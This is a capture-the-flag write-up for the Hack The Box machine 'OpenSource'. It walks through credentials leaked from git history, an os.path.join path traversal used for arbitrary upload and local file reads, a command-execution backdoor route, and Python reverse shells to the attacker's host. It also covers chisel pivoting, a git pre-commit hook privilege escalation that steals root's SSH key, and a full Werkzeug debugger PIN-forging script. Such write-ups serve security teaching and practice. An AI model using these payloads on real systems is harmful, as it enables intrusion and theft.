# OpenSource - HTB

[[_TOC_]]

## Summary

<div align="center"><img width="560" height="424" src="images/0.png"></div>

OpenSource is an excellent easy-rated HTB machine created by [irogir#8789](https://app.hackthebox.com/users/476556)

We start off with a flask web application whose source code is provided. We can leak a pair of credentials from a git commit.  
For foothold, we exploit a rather unintuitive behaviour with `os.path.join()` to upload files to arbitrary location. Alternatively, the same behaviour can be exploited to get LFR and escalated to RCE.  
This flask application is running in a docker container. We can port forward a `gitea` service running on docker host and use the leaked credentials to get `id_rsa`.  
For root, we coerce a cron job (that runs git commands) into executing arbitrary OS commands through a pre-commit hook.

## Initial recon

```console
opcode@parrot$ nmap -p- 10.10.11.164
Nmap scan report for 10.10.11.164
Host is up (0.096s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
3000/tcp filtered ppp
```

```console
opcode@parrot$ nmap -sC -sV -p 22,80 -oN opensource.nmap 10.10.11.164
Nmap scan report for 10.10.11.164
Host is up (0.25s latency).

PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 1e:59:05:7c:a9:58:c9:23:90:0f:75:23:82:3d:05:5f (RSA)
|   256 48:a8:53:e7:e0:08:aa:1d:96:86:52:bb:88:56:a0:b7 (ECDSA)
|_  256 02:1f:97:9e:3c:8e:7a:1c:7c:af:9d:5a:25:4b:b8:c8 (ED25519)
80/tcp   open     http    Werkzeug/2.1.2 Python/3.10.3
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/2.1.2 Python/3.10.3
|     Date: Sun, 22 May 2022 05:39:25 GMT
|     Content-Type: text/html; charset=utf-8
[--SNIP--]
```

Besides the standard SSH and HTTP ports, we also have a filtered port 3000.  

The website on port 80 is a flask application which allows us to upload and share files:

![1](images/1.png)

After uploading any file, we can access or download them from http://10.10.11.164/uploads/filename  
Also, if we try to use the upload button without selecting any file, we get this page:  

![2](images/2.png)

We can conclude that this flask application is running in debug mode. It means that any changes made to application files would take effect immediately.  

## Exploring git repo to leak credentials

We also have the application's source code.  
After unzipping it, we can immediately note that it is a git repository.  
Let's check the logs:
```console
opcode@parrot$ git log
commit 2c67a52253c6fe1f206ad82ba747e43208e8cfd9 (HEAD -> public)
Author: gituser <gituser@local>
Date:   Thu Apr 28 13:55:55 2022 +0200

    clean up dockerfile for production use

commit ee9d9f1ef9156c787d53074493e39ae364cd1e05
Author: gituser <gituser@local>
Date:   Thu Apr 28 13:45:17 2022 +0200

    initial
```

Let's see the changes made in the second commit:
```console
opcode@parrot$ git show 2c67a52253c6fe1f206ad82ba747e43208e8cfd9
commit 2c67a52253c6fe1f206ad82ba747e43208e8cfd9 (HEAD -> public)
Author: gituser <gituser@local>
Date:   Thu Apr 28 13:55:55 2022 +0200

    clean up dockerfile for production use
```
Here's the diff:
```diff
diff --git a/Dockerfile b/Dockerfile
index 76c7768..5b0553c 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -29,7 +29,6 @@ ENV PYTHONDONTWRITEBYTECODE=1
 
 # Set mode
 ENV MODE="PRODUCTION"
-# ENV FLASK_DEBUG=1
 
 # Run supervisord
 CMD ["/usr/bin/supervisord", "-c", "/etc/supervisord.conf"]
```

But the flask application is running in debug mode. Let's look for other branches:
```console
opcode@parrot$ git branch
  dev
* public
```
Let's switch to the dev branch:
```console
opcode@parrot$ git checkout dev
```

Logs for this one are slightly more interesting:
```console
opcode@parrot$ git log
commit c41fedef2ec6df98735c11b2faf1e79ef492a0f3 (HEAD -> dev)
Author: gituser <gituser@local>
Date:   Thu Apr 28 13:47:24 2022 +0200

    ease testing

commit be4da71987bbbc8fae7c961fb2de01ebd0be1997
Author: gituser <gituser@local>
Date:   Thu Apr 28 13:46:54 2022 +0200

    added gitignore

commit a76f8f75f7a4a12b706b0cf9c983796fa1985820
Author: gituser <gituser@local>
Date:   Thu Apr 28 13:46:16 2022 +0200

    updated

commit ee9d9f1ef9156c787d53074493e39ae364cd1e05
Author: gituser <gituser@local>
Date:   Thu Apr 28 13:45:17 2022 +0200

    initial
```

```console
opcode@parrot$ git show c41fedef2ec6df98735c11b2faf1e79ef492a0f3
commit c41fedef2ec6df98735c11b2faf1e79ef492a0f3 (HEAD -> dev)
Author: gituser <gituser@local>
Date:   Thu Apr 28 13:47:24 2022 +0200

    ease testing
```
Here's the diff:
```diff
diff --git a/Dockerfile b/Dockerfile
index 76c7768..0875eda 100644
--- a/Dockerfile
+++ b/Dockerfile
@@ -29,7 +29,7 @@ ENV PYTHONDONTWRITEBYTECODE=1
 
 # Set mode
 ENV MODE="PRODUCTION"
-# ENV FLASK_DEBUG=1
+ENV FLASK_DEBUG=1
 
 # Run supervisord
 CMD ["/usr/bin/supervisord", "-c", "/etc/supervisord.conf"]
```
This commit enables debug mode. It means that the upcloud instance on port 80 is using this one.

```console
opcode@parrot$ git show be4da71987bbbc8fae7c961fb2de01ebd0be1997
commit be4da71987bbbc8fae7c961fb2de01ebd0be1997
Author: gituser <gituser@local>
Date:   Thu Apr 28 13:46:54 2022 +0200

    added gitignore
```
Here's the diff:
```diff
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..e50a290
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1,26 @@
+.DS_Store
+.env
+.flaskenv
+*.pyc
+*.pyo
+env/
+venv/
+.venv/
+env*
+dist/
+build/
+*.egg
+*.egg-info/
+_mailinglist
+.tox/
+.cache/
+.pytest_cache/
+.idea/
+docs/_build/
+.vscode
+
+# Coverage reports
+htmlcov/
+.coverage
+.coverage.*
+*,cover
diff --git a/app/.vscode/settings.json b/app/.vscode/settings.json
deleted file mode 100644
index 5975e3f..0000000
--- a/app/.vscode/settings.json
+++ /dev/null
@@ -1,5 +0,0 @@
-{
-  "python.pythonPath": "/home/dev01/.virtualenvs/flask-app-b5GscEs_/bin/python",
-  "http.proxy": "http://dev01:Soulless_Developer#2022@10.10.10.128:5187/",
-  "http.proxyStrictSSL": false
-}
```
A file with a set of credentials are removed. This doesn't work for SSH, but we should note it down:
```
dev01:Soulless_Developer#2022
```

## Finding the anomaly with `os.path.join`

Let's go through the source code now.  
If we look at the routes defined for this flask app, we would find `/download`, `/upcloud` and `/upload`, all serving their intuitive purposes.  

But `utils.py` is interesting. They implement couple functions to get unique filenames based on current time, but they are not used anywhere in the app.  
We also have couple functions for mitigating path traversals, and they are used for the `/upcloud` and `/uploads` route:
```py
def get_file_name(unsafe_filename):
    return recursive_replace(unsafe_filename, "../", "")

def recursive_replace(search, replace_me, with_me):
    if replace_me not in search:
        return search
    return recursive_replace(search.replace(replace_me, with_me), replace_me, with_me)
```

It would recursively get rid of `../` from the filenames, which means payloads like `....//` won't work either.

But using home-brewed functions for security purposes is an anti-pattern.  
We can take a look at any path sanitizing functions from a well-maintained library and compare then against our home-brewed functions.  
It could allow us to notice edge cases that this home-brewed function is fragile against.

I looked up Werkzeug's `safe_join` for that (https://github.com/pallets/werkzeug/blob/main/src/werkzeug/security.py#L110):
```py
def safe_join(directory: str, *pathnames: str) -> t.Optional[str]:
    if not directory:
        directory = "."

    parts = [directory]

    for filename in pathnames:
        if filename != "":
            filename = posixpath.normpath(filename)

        if (
            any(sep in filename for sep in _os_alt_seps)
            or os.path.isabs(filename)
            or filename == ".."
            or filename.startswith("../")
        ):
            return None

        parts.append(filename)

    return posixpath.join(*parts)
```

The first noticable function is `posixpath.normpath`.   
Usually we do not import it directly. `os.path` becomes `ntpath` or `posixpath` depending on OS.  
Since `posixpath` is a built-in modile, we can find source for `posixpath.normpath` in `/usr/lib/python3.9/posixpath.py`.  
Going through it, you'd find that it leaves paths like `//etc/passwd` intact, but converts it into just one initial slash if the path starts with 3 or more slashes.  
It also makes sure that A//B, A/./B and A/foo/../B all become A/B.

Next, we have `_os_alt_seps` which is just a list of alternate symbols that can act as separators in a path (e.g. `\\` in windows). For linux, it's a blank list.

Now, it makes sure that the filename is not an absolute path.  
Next, the filename should not be `..` as after joining paths, it would become a `../`
And finally, filename should not start with a `../`  
The latter two make sense but the `os.path.isabs` is a bit odd.  
Take a look at it's source code:
```py
def isabs(s):
    """Test whether a path is absolute"""
    s = os.fspath(s)
    sep = _get_sep(s)
    return s.startswith(sep)
```
It just makes sure that the filename does not start with a `/`  
That should not be an issue (spoiler: it is an issue).

Let us look at the documentation for `os.path.join`:

![3](images/3.png)

> If a component is an absolute path, all previous components are thrown away and joining continues from the absolute path component.

It means that if we did something like:
```py
>>> os.path.join('/home', 'opcode', '/Downloads', 'source')
'/Downloads/source'
```
We would only get `/Downloads/source` since `/Downloads` starts with a `/` (all previous components were thrown away)

## File upload to arbitrary paths

Back to our flask applications's `views.py`, we have:
```py
@app.route('/upcloud', methods=['GET', 'POST'])
def upload_file():
    if request.method == 'POST':
        f = request.files['file']
        file_name = get_file_name(f.filename)
        file_path = os.path.join(os.getcwd(), "public", "uploads", file_name)
        f.save(file_path)
        return render_template('success.html', file_url=request.host_url + "uploads/" + file_name)
    return render_template('upload.html')
```

Using a `file_name` which starts with a `/`, we should be able to freely control where our files are saved.

## Uploading a backdoor

Since, the application is running in debug mode, we should be able to add malicious code to application files and have them immediately take effect.  
We can add a backdoor route to `views.py` which just executes OS commands for us:
```py
@app.route('/opcode')
def backdoor():
    from subprocess import check_output, STDOUT
    cmd = request.args.get('cmd')
    op = check_output(f'{cmd}; exit 0', stderr=STDOUT, shell=True)
    return op
```
The complete `views_malicious.py` is [here](views_malicious.py)

I'd write a python script: [arb_upload.py](arb_upload.py) to automate the upload:
```py
import requests
from sys import argv, exit

proxy = {}
# proxy['http'] = 'http://127.0.0.1:8080'

url = 'http://10.10.11.164'

def upload_to_location(path_to_file, path_to_upload):
    with open(path_to_file, 'rb') as f:
        file_contents = f.read()

    file = {'file': (path_to_upload, file_contents, 'text/x-python')}
    r = requests.post(url + '/upcloud', files=file, proxies=proxy)

    return r.text

if __name__ == "__main__":
    if len(argv) == 3:
        upload_to_location(argv[1], argv[2])

    else:
        print(f'[!] Usage example:')
        print(f'[-] python3 {argv[0]} \'/home/opcode/backdoor.py\' \'/tmp/test.py\' \n')
        exit()
```

Now, we can look at the Dockerfile to find where the absolute path for `views.py` should be:
```docker
# Switch working environment
WORKDIR /app

# Add application
COPY app .
```
The path should be `/app/app/views.py`

```console
opcode@parrot$ python3 arb_upload.py 'views_malicious.py' '/app/app/views.py'
```
It worked. We can execute arbitrary OS commands.

The container is running alpine and is very minimal. It doesn't even have the `bash` binary. We do have `sh`, but the bash reverse shell wouldn't work.  
We can instead use python to get a reverse shell. Visiting this URL in browser gets us a shell:
```
http://10.10.11.164/opcode?cmd=python3 -c "import socket,os,pty; s=socket.socket(); s.connect(('10.10.14.42',9001)); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn('/bin/sh')"
```

Upgrade the shell now:
```console
/app # python3 -c 'import pty;pty.spawn("/bin/sh");'
/app # ^Z
/app # stty raw -echo; fg
/app # export TERM=xterm-256color
/app # exec /bin/sh
```

## Enumerating docker host from a container

By default (on Linux), Docker sets up a bridge network and standalone containers bind directly to the Docker host’s network. There is no network isolation at all.  
In other words, we can connect to a container's network from the docker host or any other container. Similarly, we can connect to the host's network from any container.  
We can use this configuration to our advantage, and enumerate for other containers as well as the network on host and other containers.

For that, I transferred a statically linked `nmap` binary (https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap) to the box.

We can use CIDR notation with nmap as well:
```console
/app # ./nmap -p- 172.17.0.1/29
Nmap scan report for 172.17.0.1
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (0.000098s latency).
Not shown: 1145 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3000/tcp open  unknown
6000/tcp open  x11
6001/tcp open  x11-1
6002/tcp open  x11-2
6003/tcp open  x11-3
6004/tcp open  x11-4
6005/tcp open  x11-5
6006/tcp open  x11-6
6007/tcp open  x11-7
MAC Address: 02:42:AE:63:68:E5 (Unknown)

Nmap scan report for 172.17.0.2
Host is up (0.000079s latency).
Not shown: 1154 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 02:42:AC:11:00:02 (Unknown)

Nmap scan report for 172.17.0.3
Host is up (0.00011s latency).
Not shown: 1154 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 02:42:AC:11:00:03 (Unknown)

Nmap scan report for d9b37ad02521 (172.17.0.4)
Host is up (0.0000070s latency).
Not shown: 1154 closed ports
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for 172.17.0.5
Host is up (0.000056s latency).
Not shown: 1154 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 02:42:AC:11:00:05 (Unknown)

Nmap scan report for 172.17.0.6
Host is up (0.000068s latency).
Not shown: 1154 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 02:42:AC:11:00:06 (Unknown)

Nmap scan report for 172.17.0.7
Host is up (0.000069s latency).
Not shown: 1154 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 02:42:AC:11:00:07 (Unknown)
```

We don't even have `curl` on the box to access these services.  
We need to create a tunnel to our local machine.

## SOCKS proxy through chisel

On my system:
```
opcode@parrot$ ./chisel server -p 9999 --socks5 --reverse -v
```

On the box:
```
/tmp # ./chisel client 10.10.14.42:9999 R:socks
```

On our system, we would see these logs:
```
server: session#1: tun: Created (SOCKS enabled)
server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening
server: session#1: tun: Bound proxies
server: session#1: tun: SSH connected
```

Now, we need to add this line to `/etc/proxychains.conf`:
```
socks5  127.0.0.1 1080
```

Next, I started firefox with:
```console
opcode@parrot$ proxychains firefox
```

172.17.0.2 and others are running an instance for upcloud on port 80, probably for load balancing.

But 172.17.0.1:3000 is running an instance of `gitea`

## Password reuse on gitea

We can use the credentials we had found earlier for `gitea` login
```
dev01:Soulless_Developer#2022
```

They only have one repository, and it is a backup of the user's home directory.  
We can also find the user's `id_rsa` there and use it to login as user `dev01`:
```console
opcode@parrot$ chmod 600 id_rsa
opcode@parrot$ ssh -i id_rsa dev01@10.10.11.164
```

## Getting root with pre-commit hook

We can transfer and run `pspy` (https://github.com/DominicBreuker/pspy) on this box to monitor cron jobs.

```
2022/05/22 19:44:01 CMD: UID=0    PID=10638  | /usr/sbin/CRON -f 
2022/05/22 19:44:01 CMD: UID=0    PID=10643  | /bin/bash /root/meta/app/clean.sh 
2022/05/22 19:44:01 CMD: UID=0    PID=10644  | /bin/sh -c /usr/local/bin/git-sync 
2022/05/22 19:44:01 CMD: UID=0    PID=10647  | /bin/bash /usr/local/bin/git-sync 
2022/05/22 19:44:01 CMD: UID=0    PID=10648  | git status --porcelain 
2022/05/22 19:44:01 CMD: UID=0    PID=10650  | git add . 
2022/05/22 19:44:01 CMD: UID=0    PID=10651  | git commit -m Backup for 2022-05-22 
2022/05/22 19:44:01 CMD: UID=0    PID=10654  | /sbin/modprobe -q -- net-pf-10 
2022/05/22 19:44:01 CMD: UID=0    PID=10653  | /usr/lib/git-core/git-remote-http origin http://opensource.htb:3000/dev01/home-backup.git 
2022/05/22 19:44:01 CMD: UID=0    PID=10652  | git push origin main 
```

Let's find `/usr/local/bin/git-sync`:
```console
dev01@opensource:~$ cat /usr/local/bin/git-sync 
#!/bin/bash

cd /home/dev01/

if ! git status --porcelain; then
    echo "No changes"
else
    day=$(date +'%Y-%m-%d')
    echo "Changes detected, pushing.."
    git add .
    git commit -m "Backup for ${day}"
    git push origin main
fi
```

This cron job monitors `/home/dev01` for changes and when found, makes a git commit and attempts to push it to remote.  
The page about `git` on GTFObins tells us about pre-commit hooks for privesc.  
`git` hooks are custom scripts that get fired off when certain important actions occur. Pre-commit hook runs right before a commit is made. We can put our malicious commands in there and the cron would run it as root.

```console
dev01@opensource:~$ echo 'cp /root/.ssh/id_rsa /tmp/id_rsa; chown dev01 /tmp/id_rsa' > /home/dev01/.git/hooks/pre-commit
dev01@opensource:~$ chmod +x /home/dev01/.git/hooks/pre-commit
```

We can find root's `id_rsa` in `/tmp` and use it to SSH as root:
```console
opcode@parrot$ chmod 600 id_rsa.root
opcode@parrot$ ssh -i id_rsa.root root@10.10.11.164
```
# Alternate foothold approach - LFR to determine flask debugger PIN

## Abusing `os.path.join` anomaly to get LFR

Instead of exploiting `os.path.join` to write to arbitrary location, we can abuse it for Local File Read (LFR). Then, we can leak certain files and used them to predict the flask debugger pin.

We would be able to debug issues better if we first test the exploit on a local docker instance.  
After switching to `dev` branch, start the container with the provided script:
```console
opcode@parrot$ git checkout dev
opcode@parrot$ ./build-docker.sh
```

We can get a shell inside the running docker with:
```console
opcode@parrot$ sudo docker exec -it upcloud sh
```
And we can modify any file we want.

So, the code responsible for pulling the uploaded files:
```py
@app.route('/uploads/<path:path>')
def send_report(path):
    path = get_file_name(path)
    return send_file(os.path.join(os.getcwd(), "public", "uploads", path))
```

We control the value of `path`. We want it to start with a `/`
Let's modify it a bit:
```py
@app.route('/uploads/<path:path>')
def send_report(path):
    app.logger.info(f'{path = }')
    path = get_file_name(path)
    return send_file(os.path.join(os.getcwd(), "public", "uploads", path))
```
It would help us find a suitable payload.

Now, we can try a bunch of payloads with curl to see if the `/` sticks:
```console
opcode@parrot$ curl --path-as-is 'http://127.0.0.1/uploads//etc/passwd'
```
The log says:
```
172.17.0.1 - - [22/May/2022 20:20:42] "GET /uploads//etc/passwd HTTP/1.1" 308 -
```
It redirects to `http://127.0.0.1/uploads/etc/passwd`

We can use the sanitizing function to our advantage:
```console
opcode@parrot$ curl --path-as-is 'http://127.0.0.1/uploads/../etc/passwd'
```
The log says:
```
[2022-05-22 20:20:55,653] INFO in views: path = '../etc/passwd'
```
After sanitization, it becomes `etc/passwd`

```console
opcode@parrot$ curl --path-as-is 'http://127.0.0.1/uploads/..//etc/passwd'
```
We do not get a 308 with this one. The log says `path=..//etc/passwd`  
And after sanitization, we get `/etc/passwd`  
This is the LFI payload.

## Source code for debugger PIN generation

We can look at flask source code to find how the PIN is generated.  
In the docker container, we can find it at `/usr/local/lib/python3.10/site-packages/werkzeug/debug/__init__.py`  
You can also find it [here](debug__init__.py)

This is the relevant function:
```py
def get_pin_and_cookie_name(
    app: "WSGIApplication",
) -> t.Union[t.Tuple[str, str], t.Tuple[None, None]]:
    """Given an application object this returns a semi-stable 9 digit pin
    code and a random key.  The hope is that this is stable between
    restarts to not make debugging particularly frustrating.  If the pin
    was forcefully disabled this returns `None`.

    Second item in the resulting tuple is the cookie name for remembering.
    """
    pin = os.environ.get("WERKZEUG_DEBUG_PIN")
    rv = None
    num = None

    # Pin was explicitly disabled
    if pin == "off":
        return None, None

    # Pin was provided explicitly
    if pin is not None and pin.replace("-", "").isdecimal():
        # If there are separators in the pin, return it directly
        if "-" in pin:
            rv = pin
        else:
            num = pin

    modname = getattr(app, "__module__", t.cast(object, app).__class__.__module__)
    username: t.Optional[str]

    try:
        # getuser imports the pwd module, which does not exist in Google
        # App Engine. It may also raise a KeyError if the UID does not
        # have a username, such as in Docker.
        username = getpass.getuser()
    except (ImportError, KeyError):
        username = None

    mod = sys.modules.get(modname)

    # This information only exists to make the cookie unique on the
    # computer, not as a security feature.
    probably_public_bits = [
        username,
        modname,
        getattr(app, "__name__", type(app).__name__),
        getattr(mod, "__file__", None),
    ]

    # This information is here to make it harder for an attacker to
    # guess the cookie name.  They are unlikely to be contained anywhere
    # within the unauthenticated debug page.
    private_bits = [str(uuid.getnode()), get_machine_id()]

    h = hashlib.sha1()
    for bit in chain(probably_public_bits, private_bits):
        if not bit:
            continue
        if isinstance(bit, str):
            bit = bit.encode("utf-8")
        h.update(bit)
    h.update(b"cookiesalt")

    cookie_name = f"__wzd{h.hexdigest()[:20]}"

    # If we need to generate a pin we salt it a bit more so that we don't
    # end up with the same value and generate out 9 digits
    if num is None:
        h.update(b"pinsalt")
        num = f"{int(h.hexdigest(), 16):09d}"[:9]

    # Format the pincode in groups of digits for easier remembering if
    # we don't have a result yet.
    if rv is None:
        for group_size in 5, 4, 3:
            if len(num) % group_size == 0:
                rv = "-".join(
                    num[x : x + group_size].rjust(group_size, "0")
                    for x in range(0, len(num), group_size)
                )
                break
        else:
            rv = num

    return rv, cookie_name
```

`rv` here is the debugger PIN. Let's track how it is determined.  
`rv` depends on `num` which depends on the hash `h`  
And hash is calculated with `probably_public_bits` and `private_bits`

Let us start with the `probably_public_bits`:
```py
    probably_public_bits = [
        username,
        modname,
        getattr(app, "__name__", type(app).__name__),
        getattr(mod, "__file__", None),
    ]
```

`username` is acquired from `username = getpass.getuser()`
We can find it on the container with:
```console
/app # python3 -c 'import getpass; print(getpass.getuser())'
root
```

Similarly, `modname` is obtained from `getattr(app, "__module__", t.cast(object, app).__class__.__module__)`. To find it, we can use the debugger console:
```python
>>> import typing as t
>>> getattr(app, "__module__", t.cast(object, app).__class__.__module__)
'flask.app'
```

I used the debugger console for the next two as well:
```python
>>> getattr(app, "__name__", type(app).__name__)
'Flask'
```
And
```python
>>> import sys
>>> modname = getattr(app, "__module__", t.cast(object, app).__class__.__module__)
>>> mod = sys.modules.get(modname)
>>> getattr(mod, "__file__", None)
'/usr/local/lib/python3.10/site-packages/flask/app.py'
```

Note that even though these values are from our local docker container, they would stay the same on remote:
```python
probably_public_bits = [
    'root',
    'flask.app',
    'Flask',
    '/usr/local/lib/python3.10/site-packages/flask/app.py',
]
```

On the other hand, `private_bits` (`str(uuid.getnode())` and `get_machine_id()`) would change on remote, and we would have to use the LFR for these.

`uuid.getnode()` gives us the hardware address as a 48-bit positive integer. “Hardware address” means the MAC address of a network interface.  
We can get network interface from `/proc/net/arp`. Here, we have the `eth0` interface.  
We can get the corresponding MAC address with:
```console
opcode@parrot$ curl --path-as-is 'http://127.0.0.1/uploads/..//sys/class/net/eth0/address'
02:42:ac:11:00:02
```

We need it's integer value:
```console
opcode@parrot$ python3 -c "print(int('02:42:ac:11:00:02'.replace(':', ''), 16))"
2485377892354
```
This is supposed to be private, but it is very predictable for docker containers.  
The MAC address is generated using the IP address allocated to the container to avoid ARP collisions, using a range from 02:42:ac:11:00:00 to 02:42:ac:11:ff:ff  
Hence, we could have brute-forced it.

The final piece to the puzzle is `get_machine_id()`  
This function pulls the machine-id from `/etc/machine-id` and if it doesn't exist then from `/proc/sys/kernel/random/boot_id`  
On docker containers, it would be the latter.  
Usually, it ends here. But all docker containers on a system share the same machine id, hence they also add some cgroup information:
```py
with open("/proc/self/cgroup", "rb") as f:
    linux += f.readline().strip().rpartition(b"/")[2]
```
We also have to pull this one with LFR

## Issue with reading `/proc` through LFR

Now, we need to script these steps to obtain the private bits.  
I tried to use `requests` in python and faced an issue. Trying to get `boot_id` and `cgroup` results in a blank response. `curl` similarly gives a blank response.

![4](images/4.png)

But the response is visible in burp:

![5](images/5.png)

I think it is because the Content-Length is 0. (Even though the response has a body)  
That Content-Length zero is because the size of file is 0 bytes. `/proc` a virtual file system so it is normal for a lot of files inside to have zero size.

To get around it, I tried a bunch of things with `urllib`, but nothing worked.  
In the end, I had to use `socket` and make the GET request manually. That way, I could parse the response my way.

Here's the function:
```py
import socket

host = '127.0.0.1'

def read_file(path):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, 80))

    method = b'GET '
    path = b'/uploads/../' + path.encode()
    protocol = b' HTTP/1.1\r\n'
    host_header = b'Host:' + host.encode() + b'\r\n\r\n'

    sock.send(method + path + protocol + host_header)
    response = sock.recv(4096)
    response = response.split(b'\r\n\r\n')[-1]
    # response = response.replace(b'\x00', b' ')
    return response.decode()
```

I pieced it all together to successfully generate the debugger PIN. Here's the final script for remote:
```py
import hashlib
import socket
from itertools import chain

host = '10.10.11.164'


def read_file(path):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((host, 80))

    method = b'GET '
    path = b'/uploads/../' + path.encode()
    protocol = b' HTTP/1.1\r\n'
    host_header = b'Host:' + host.encode() + b'\r\n\r\n'

    sock.send(method + path + protocol + host_header)
    response = sock.recv(4096)
    response = response.split(b'\r\n\r\n')[-1]
    # response = response.replace(b'\x00', b' ')
    return response.decode()


mac = read_file('/sys/class/net/eth0/address')[:-1]
mac = int(''.join(mac.split(':')), 16)

machine_id = read_file('/proc/sys/kernel/random/boot_id')[:-1]

cgroup = read_file('/proc/self/cgroup').encode()
cgroup = cgroup.split(b'\n')[0]
cgroup = cgroup.rpartition(b'/')[2].decode()

probably_public_bits = [
    'root',
    'flask.app',
    'Flask',
    '/usr/local/lib/python3.10/site-packages/flask/app.py'
]

private_bits = [
    str(mac),
    machine_id + cgroup
]

h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode("utf-8")
    h.update(bit)
h.update(b"cookiesalt")

cookie_name = f"__wzd{h.hexdigest()[:20]}"

num = None
h.update(b"pinsalt")
num = f"{int(h.hexdigest(), 16):09d}"[:9]

rv = None
for group_size in 5, 4, 3:
    if len(num) % group_size == 0:
        rv = "-".join(
            num[x: x + group_size].rjust(group_size, "0")
            for x in range(0, len(num), group_size)
        )
        break
else:
    rv = num

print(f'Debugger PIN: {rv}')
```

Once, in the console we can get a shell with this command:
```py
>>> import socket,os,pty; s=socket.socket(); s.connect(('10.10.14.42',9001)); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn('/bin/sh')
```
